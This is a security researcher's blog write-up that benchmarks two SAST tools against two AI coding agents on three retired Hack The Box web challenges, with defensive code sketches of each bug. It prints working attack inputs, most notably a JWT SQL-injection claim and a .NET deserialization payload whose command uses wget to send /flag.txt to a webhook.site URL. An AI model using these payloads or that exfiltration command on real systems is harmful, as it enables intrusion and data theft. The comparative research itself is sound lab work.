There's a lot of noise right now about AI replacing traditional SAST tools — and honestly, it's hard to dismiss entirely. But it's also hard to take at face value. In practice, SAST tools produce plenty of false positives and routinely miss real vulnerabilities. AI agents aren't clean either — I've personally hit false positives from AI on SQL injection findings. So instead of taking sides, I decided to actually test it: run both approaches against the same targets and see what sticks.

Here's what I used:

- Semgrep Code (free version)

- Snyk Code (free version)

- Cursor (Pro subscription)

- Claude Code (Pro plan)

As test subjects, I chose machines from the Challenges section of the Hack The Box platform. Since this is a public study (essentially a writeup), all machines are from the Retired section, which requires a VIP+ subscription. Each machine comes with an official writeup and source code available for research, and the applications can be spun up via Docker when needed. The three machines:

- Spiky Tamagotchi

- Nexus Void

- UnEarthly Shop

All supporting materials (prompts, scan results, notes) are stored in the GitHub repo.

We'll start with Spiky Tamagotchi. This first walkthrough will be fairly detailed so you can reproduce the steps if you'd like — the two remaining challenges will focus on comparing results. Let's go!

Spiky Tamagotchi

The exploit chain in this challenge looks like this:

- SQL Injection, specifically the technique described in an article on Medium, though personally I'd reframe it as Object Type Injection in mysql rather than a classic SQL injection. To obtain the admin session cookie:

POST /api/login HTTP/1.1
Host: 127.0.0.1:1337
Content-Type: application/json

{"username":"admin","password":{"password": 1}}

- RCE via Node.js code injection
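To make the first step less abstract, here's a minimal Python sketch that models how the Node.js mysql library expands an object bound to a `?` placeholder into key = value pairs instead of a single quoted string. It's a simplified model, not the library's code: `escape_value`, `format_query`, and the login query are my assumptions for illustration, and the challenge's real query may look different.

```python
def escape_value(value):
    """Simplified model of how the Node.js mysql library escapes a bound value."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    if isinstance(value, dict):
        # Objects become `key` = value pairs instead of a single quoted string.
        return ", ".join(
            "`{}` = {}".format(key.replace("`", "``"), escape_value(val))
            for key, val in value.items()
        )
    # Strings are quoted, with backslashes and single quotes escaped.
    return "'" + str(value).replace("\\", "\\\\").replace("'", "\\'") + "'"


def format_query(sql, params):
    """Substitute each ? placeholder with the escaped parameter, left to right."""
    parts = sql.split("?")
    out = parts[0]
    for param, tail in zip(params, parts[1:]):
        out += escape_value(param) + tail
    return out


# Hypothetical login query; the real one in the challenge may differ.
LOGIN_SQL = "SELECT username FROM users WHERE username = ? AND password = ?"

benign = format_query(LOGIN_SQL, ["admin", "hunter2"])
malicious = format_query(LOGIN_SQL, ["admin", {"password": 1}])

print(benign)
print(malicious)
```

With the object payload, the condition ends in password = `password` = 1. MySQL compares the column with itself, gets 1, and then checks 1 = 1, so the password check passes for any stored value. No quote ever needs to be broken out of, which is why this looks so different from a classic SQL injection.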

Beyond the intended critical vulnerabilities, I also decided to track the obvious low-hanging fruit — hardcoded credentials, missing security headers on sensitive cookies, and similar issues that SAST tools are typically good at catching.

So we know what we're looking for. Let's set up the tools and run them. I'm working on Windows, and I started with Semgrep. The cleanest way to run Semgrep on Windows is via Docker (Semgrep setup guide). Just launch Docker Desktop, navigate to the project folder, and run:



docker run --rm -v "${PWD}:/src" semgrep/semgrep:latest semgrep scan --config="auto"

The scan completed quickly and returned the following (the full Semgrep output on GitHub):

Three findings — none of them critical. Moving on.

Next up: Snyk. The VSCode extension (and Cursor's too) has been misbehaving lately, so I went with Snyk CLI (Snyk CLI docs). After installing and authenticating, run this in the project folder:

snyk code test

This one returned a more interesting result (the full Snyk output on GitHub):

Code injection detected — which maps directly to the RCE vector.

Now, Cursor. I used automatic model selection for balance — and since I'm testing Claude Opus 4.6 separately, I'll refer to this simply as "Cursor" throughout. To get the best results, I prepared a prompt in advance using Gemini. The final prompt is available in the GitHub repo.

Running it in Cursor (the full Cursor output on GitHub):

The potential RCE vector was detected, along with three medium severity issues.





Then Claude Code. I added the Claude extension to Cursor, ran the same prompt, and got a solid result (the full Claude output on GitHub):

RCE detected, plus confirmation of several other security issues.

I'll consolidate everything into a comparison table at the end, but here's the headline finding: none of the tools detected the Object Type Injection. Understandable — this class of vulnerability is genuinely hard to catch through static analysis and tends to show up better in dynamic testing. Still worth noting.

One thing caught my attention while reviewing Claude's responses: at some point it started referencing flag.txt. That raised a flag for me — Claude can use writeups, known patterns, and web search, which could skew the results. So I updated the prompt for the remaining machines, adding explicit sections like ISOLATED ANALYSIS MODE (NO EXTERNAL KNOWLEDGE LOOKUP) and ZERO SPECULATION MODE to keep the analysis as objective as possible.





And final results:

Nexus Void

For the second machine I chose Nexus Void — a step up in difficulty, rated Medium. The official writeup describes a two-step chain: .NET Deserialization and SQL Injection.



Semgrep found 10 vulnerabilities (the full Semgrep output on GitHub), including several CORS and RegExp issues, and one finding directly relevant to the intended chain — Insecure Deserialization:

Nexus_Void/Helpers/SerializeHelper.cs

❯❱ csharp.lang.security.insecure-deserialization.newtonsoft.insecure-newtonsoft-deserialization

❰❰ Blocking ❱❱

TypeNameHandling All is unsafe and can lead to arbitrary code execution in the context of the

process. Use a custom SerializationBinder whenever using a setting other than TypeNameHandling.None.

Details: https://sg.run/8n2g

12┆ TypeNameHandling = TypeNameHandling.All

⋮┆----------------------------------------



25┆ TypeNameHandling = TypeNameHandling.All

Next, Snyk (the full Snyk output on GitHub):

At this point I'm starting to think the Snyk team actively researches HackTheBox machines and ships rules accordingly 😄. Both SQL Injection and Insecure Deserialization were detected — we'll check the accuracy shortly.

Running Cursor with the updated prompt (the full Cursor output on GitHub):



It flagged all the potential SQLi issues and rated the Insecure Deserialization as Low. Worth highlighting a few particularly interesting finds: Plaintext Password Storage in Database, Missing Rate Limiting / Account Lockout on Login, Application Running as root via Supervisor Configuration — all legitimate — and an intriguing one: Embedded Shell Command Execution Helper (Potential RCE Sink):









Finally, Claude Code. Worth noting: this one takes time, around 7–8 minutes from start to results. But the output was impressive. Claude didn't just find all the previously identified vulnerabilities; it mapped out a full exploit chain all the way to flag.txt:

What surprised me most was the specific path Claude chose. Instead of, say, exploiting the User ID field in the JWT, it went through the username parameter — exactly as described in the official writeup:

{
  "username": "test",
  "ID": "' AND 1=2 UNION SELECT 1, 'user', '<base64 encoded payload>",
  "exp": 1773233764,
  "iss": "NexusVoid",
  "aud": "NexusVoid"
}

That made me curious, so I asked Claude directly which sources it had used:

If that's accurate — no external lookups, no writeup searches, pure static analysis — that's a genuinely impressive result (the full Claude output on GitHub).
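To show what the ID claim in that token does to a query, here's a small sketch using Python's built-in sqlite3 module. Everything here is an assumption for illustration: the `users` table, its columns, and the two `load_user_*` functions are hypothetical, and the real application isn't necessarily built on SQLite. The point is only the pattern: a claim value concatenated into SQL lets the UNION branch return a row the attacker fully controls.

```python
import sqlite3

# Hypothetical schema and data; the real Nexus Void tables are not shown in this article.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id TEXT, username TEXT, data TEXT)")
conn.execute("INSERT INTO users VALUES ('1', 'test', 'legit-serialized-profile')")


def load_user_unsafe(user_id):
    # Vulnerable pattern: the claim value is concatenated into the SQL text.
    sql = "SELECT id, username, data FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def load_user_safe(user_id):
    # Parameterized query: the claim value is always treated as data.
    return conn.execute(
        "SELECT id, username, data FROM users WHERE id = ?", (user_id,)
    ).fetchall()


# Same shape as the ID claim above, with a placeholder instead of a real payload.
claim = "' AND 1=2 UNION SELECT 1, 'user', 'ATTACKER-CONTROLLED-BLOB"

unsafe_rows = load_user_unsafe(claim)
safe_rows = load_user_safe(claim)
print(unsafe_rows)
print(safe_rows)
```

The unsafe version returns exactly one row, and its third column is whatever the attacker put in the token. If the application later deserializes that column, the SQL injection becomes the delivery mechanism for the second bug in the chain.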



Looking at the writeup more closely: beyond SQL Injection and Insecure Deserialization, it's worth returning to StatusCheckHelper.cs, which was flagged by both Cursor and Claude.

This is the actual RCE sink — the payload injected via the SQL Injection and JWT vulnerability looks like this:

{"$type":"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void","output":null,"command":"wget https://webhook.site/15aa06f8-ee4f-497c-9f16-22ab4a30fa9c?x=$(cat /flag.txt)"}

Claude didn't map this sink into the attack chain initially, but when I asked for a step-by-step walkthrough, it got there:

The same issue was also reported separately as "Unauthenticated Shell Command Execution Infrastructure with World-Writable Script Paths".
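Why does a `$type` field in JSON lead to command execution at all? Here's a rough Python model of type-tagged deserialization, the behavior Semgrep warned about with TypeNameHandling.All. This is not Json.NET and not the challenge's code: the classes, the `KNOWN_TYPES` registry, and the idea that the sink is a property setter are my assumptions, and the "command" is only recorded in a list, never executed.

```python
import json

executed = []  # stands in for a real shell; nothing is actually run


class StatusCheckHelper:
    """Hypothetical stand-in for a helper whose property setter runs a command."""

    def __init__(self):
        self.output = None
        self._command = None

    @property
    def command(self):
        return self._command

    @command.setter
    def command(self, value):
        self._command = value
        executed.append(value)  # the real sink would spawn a process here


class UserProfile:
    def __init__(self):
        self.username = None


# Every class the "runtime" knows about, reachable by name.
KNOWN_TYPES = {"StatusCheckHelper": StatusCheckHelper, "UserProfile": UserProfile}


def deserialize(text, allowed=None):
    """Instantiate whatever $type names, unless an allowlist is supplied."""
    data = json.loads(text)
    type_name = data.pop("$type")
    if allowed is not None and type_name not in allowed:
        raise ValueError("type not allowed: " + type_name)
    obj = KNOWN_TYPES[type_name]()
    for key, value in data.items():
        setattr(obj, key, value)  # property setters fire during deserialization
    return obj


payload = '{"$type": "StatusCheckHelper", "output": null, "command": "id"}'

deserialize(payload)  # behaves like TypeNameHandling.All: attacker picks the type
try:
    deserialize(payload, allowed={"UserProfile"})
    blocked = False
except ValueError:
    blocked = True
print(executed, blocked)
```

The allowlist plays the role of the custom SerializationBinder that the Semgrep rule recommends: the data can still say which type it wants, but the application decides whether that type is acceptable before anything gets constructed.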

And the full results table for this machine:



UnEarthly Shop

For the third and final machine I picked the hardest one — UnEarthly Shop, rated Hard. The official description reads:

The challenge involves exploiting a pipeline injection vulnerability in MongoDB aggregation query, and insecure deserialization to custom POP chain RCE in PHP.

Let's dig in.

This time, to make things harder for the AI agents and remove any HTB-specific hints, I stripped out all references to flag.txt from the codebase before scanning.

Semgrep returned 3 findings (the full Semgrep output on GitHub):

Container running as root, use of unserialize(), and a potential path traversal via an alias misconfiguration.

Snyk returned a large number of findings, which can be grouped into: Cross-Site Scripting (XSS), DOM-based XSS, Path Traversal, hardcoded passwords (likely just sample AWS credentials), Open Redirect, and a pile of code injection issues — all of them inside the vendor folder, which is out of scope (the full Snyk output on GitHub).

Nothing related to the MongoDB pipeline injection or insecure deserialization.



Cursor identified (the full Cursor output on GitHub):

- Insecure PHP Object Deserialization Chain via Admin User Update API

- Unauthenticated MongoDB Aggregation Injection via /api/products

Both map directly to the intended exploit flow. Also flagged: MongoDB started with --noauth (authentication disabled) and Stored XSS in Admin Dashboard via unsanitized username.
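For readers who haven't met aggregation injection before, here's a minimal sketch of the pattern in plain Python, with no database involved. It assumes the endpoint parses client JSON and uses it directly as a pipeline stage. That is my reading of the finding, not code from the challenge, and the collection names, field names, and `ALLOWED_STAGES` set are hypothetical.

```python
import json

ALLOWED_STAGES = {"$match", "$sort", "$limit"}


def build_pipeline_unsafe(user_json):
    # Vulnerable pattern: a client-supplied stage is dropped into the pipeline as-is.
    stage = json.loads(user_json)
    return [stage, {"$limit": 20}]


def build_pipeline_safe(user_json):
    # Only accept a single-key stage whose operator is on the allowlist.
    stage = json.loads(user_json)
    if not isinstance(stage, dict) or len(stage) != 1:
        raise ValueError("expected exactly one stage operator")
    (operator,) = stage.keys()
    if operator not in ALLOWED_STAGES:
        raise ValueError("stage not allowed: " + operator)
    return [stage, {"$limit": 20}]


benign = '{"$match": {"category": "weapons"}}'
# $lookup joins in another collection, so it can pull data the endpoint never meant to expose.
malicious = '{"$lookup": {"from": "users", "localField": "_id", "foreignField": "_id", "as": "leak"}}'

print(build_pipeline_unsafe(malicious))
print(build_pipeline_safe(benign))
try:
    build_pipeline_safe(malicious)
    rejected = False
except ValueError:
    rejected = True
```

The unsafe builder happily hands the attacker's `$lookup` stage to the database, while the allowlisted builder rejects it. A real fix would more likely build the stage server-side from individual validated fields, but the sketch shows why letting the client choose the operator is the core problem.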

Claude returned:

- Unauthenticated MongoDB Aggregation Pipeline Injection

- PHP Object Injection via unserialize() on attacker-controllable session data

- Mass Assignment enabling privilege escalation and deserialization payload injection (authenticated path)

- Plaintext password storage and comparison

- Nginx alias path traversal (off-by-slash misconfiguration)

…plus a few minor issues (the full Claude output on GitHub).
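The off-by-slash finding is easy to misread, so here's a tiny Python model of how an Nginx alias maps a request path to a file path. It only imitates the prefix-strip-and-append logic, and the `/static` location and `/www/static/` alias are hypothetical paths, not the challenge's actual config.

```python
import posixpath


def resolve_alias(location, alias, request_path):
    """Model nginx alias mapping: strip the location prefix, append the rest to alias."""
    if not request_path.startswith(location):
        return None
    remainder = request_path[len(location):]
    return posixpath.normpath(alias + remainder)


# Hypothetical paths. The misconfigured location lacks a trailing slash; the alias has one.
ALIAS = "/www/static/"

escaped = resolve_alias("/static", ALIAS, "/static../secret.txt")
contained = resolve_alias("/static/", ALIAS, "/static../secret.txt")
normal = resolve_alias("/static", ALIAS, "/static/logo.png")
print(escaped, contained, normal)
```

With the trailing slash missing from the location, a request for /static../secret.txt still matches the prefix, and the leftover ../secret.txt climbs one directory above the alias root. Adding the slash to the location makes the same request fall through without matching.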

This time, no full exploit chain was proposed — which is worth noting given how well Claude performed on Nexus Void.

As a side note: UnEarthly Shop is a genuinely interesting machine. The vulnerability classes and chaining logic make it very CWEE/OSWE-like — highly recommended for anyone preparing for those certifications.

Final results table:

Conclusion

Let's wrap up. We analyzed three machines of varying difficulty using four different tools. The results show that AI agents are genuinely effective at identifying vulnerable code — but traditional SAST holds its own too.

There's also a broader context worth acknowledging: development teams are increasingly using AI to write code, which means the volume of new code, features, and updates is growing faster than ever. AppSec teams simply can't keep up with manual review at that pace. Using AI-assisted analysis for certain checks isn't just convenient — it's becoming a practical necessity.

My overall take: the most effective approach isn't choosing one over the other, it's combining them deliberately. Run SAST on large codebases where full AI context would be expensive and impractical. Use AI during manual code review, and for reviewing smaller chunks — pull requests, merge requests, focused diffs. This keeps token usage reasonable, makes better use of the context window, and gives AppSec teams a realistic shot at covering more ground without burning out.

One result worth calling out specifically: none of the tools detected the Object Type Injection in Spiky Tamagotchi — not the SAST tools, not the AI agents. This isn't a minor miss. It shows the current ceiling of both approaches. Some vulnerability classes, particularly those that emerge from how data types interact at runtime, remain genuinely difficult to catch through static analysis alone. That's an important limitation to keep in mind when deciding how much to trust any of these tools.

A few caveats worth being upfront about. I used the free versions of both Snyk and Semgrep, which are likely limited in their ruleset coverage. The paid tiers may produce meaningfully different results.

There's also the question of training data. The exploit chain Claude constructed for Nexus Void was suspiciously close to the official writeup — which raises the possibility that AI agents have been trained on, or have searched, publicly available writeups. That said, this cuts both ways: nothing stops anyone from feeding known vulnerable code patterns into SAST rules either.

For a truly objective comparison, the ideal setup would use code with no public vulnerability reports, machines with no public writeups, and paid versions of the SAST tools. If this research turns out to be useful, I plan to continue — a follow-up with more complex chains and harder targets seems like a natural next step.